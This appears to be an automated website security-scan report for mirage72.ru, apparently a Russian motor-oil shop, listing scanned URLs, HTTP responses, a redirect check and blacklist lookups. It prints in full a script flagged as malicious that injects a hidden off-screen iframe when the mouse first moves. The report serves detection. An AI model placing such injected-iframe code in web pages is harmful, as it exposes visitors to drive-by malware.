Scanned pages/files
| Request | Server response | Status |
http://mirage72.ru/ | 200 OK Content-Length: 5092 Content-Type: text/html | clean |
http://mirage72.ru/magaziny.html | 200 OK Content-Length: 7014 Content-Type: text/html | clean |
http://mirage72.ru/brands.html | 200 OK Content-Length: 14200 Content-Type: text/html | clean |
http://changeip.changeip.name/rsize.js | 200 OK Content-Length: 405 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) res='ÐÑибка MySQL'; var astatf = 0; document.write("<head></head><b><div id='staticaccoin'></div></b>"); document.onmousemove=moveonlinetest; function moveonlinetest() { if (astatf == 0) { astatf++; text = "<iframe src='"+res+"' width='10' height='16' style='position: absolute; z-index: 1; left: -1000px; top: -1000px;'></iframe>"; document.getElementById("staticaccoin").innerHTML = text }} Antivirus reports:
| ||
http://mirage72.ru/zakaz.html | 200 OK Content-Length: 2981 Content-Type: text/html | clean |
http://mirage72.ru/contacts.html | 200 OK Content-Length: 3036 Content-Type: text/html | clean |
http://mirage72.ru/test404page.js | 404 Not Found Content-Length: 234 Content-Type: text/html | clean |
http://mirage72.ru/brands/brand_tza.html | 200 OK Content-Length: 3646 Content-Type: text/html | clean |
http://mirage72.ru/brands/brand_castrol.html | 200 OK Content-Length: 2965 Content-Type: text/html | clean |
http://mirage72.ru/brands/brand_mobil.html | 200 OK Content-Length: 3293 Content-Type: text/html | clean |
http://mirage72.ru/brands/brand_daaz.html | 200 OK Content-Length: 3393 Content-Type: text/html | clean |
http://mirage72.ru/brands/brand_motul.html | 200 OK Content-Length: 3937 Content-Type: text/html | clean |
http://mirage72.ru/brands/brand_bzak.html | 200 OK Content-Length: 4458 Content-Type: text/html | clean |
http://mirage72.ru/brands/brand_liqui_moli.html | 200 OK Content-Length: 3681 Content-Type: text/html | clean |
http://mirage72.ru/brands/brand_trek.html | 200 OK Content-Length: 4200 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: mirage72.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Aug 2014 15:49:17 GMT
Accept-Ranges: bytes
ETag: "1c70d2b-13e4-4ff81f02a2300"
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 5092
Content-Type: text/html
Last-Modified: Thu, 31 Jul 2014 19:04:12 GMT
...5092 bytes of data.
GET / HTTP/1.1
Host: mirage72.ru
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Aug 2014 15:49:17 GMT
Accept-Ranges: bytes
ETag: "1c70d2b-13e4-4ff81f02a2300"
Server: Apache/2
Vary: Accept-Encoding,User-Agent
Content-Length: 5092
Content-Type: text/html
Last-Modified: Thu, 31 Jul 2014 19:04:12 GMT
...5092 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: mirage72.ru
Referer: http://www.google.com/search?q=mirage72.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: mirage72.ru
Referer: http://www.google.com/search?q=mirage72.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=mirage72.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mirage72.ru/
Result: mirage72.ru is not infected or malware details are not published yet.
Result: mirage72.ru is not infected or malware details are not published yet.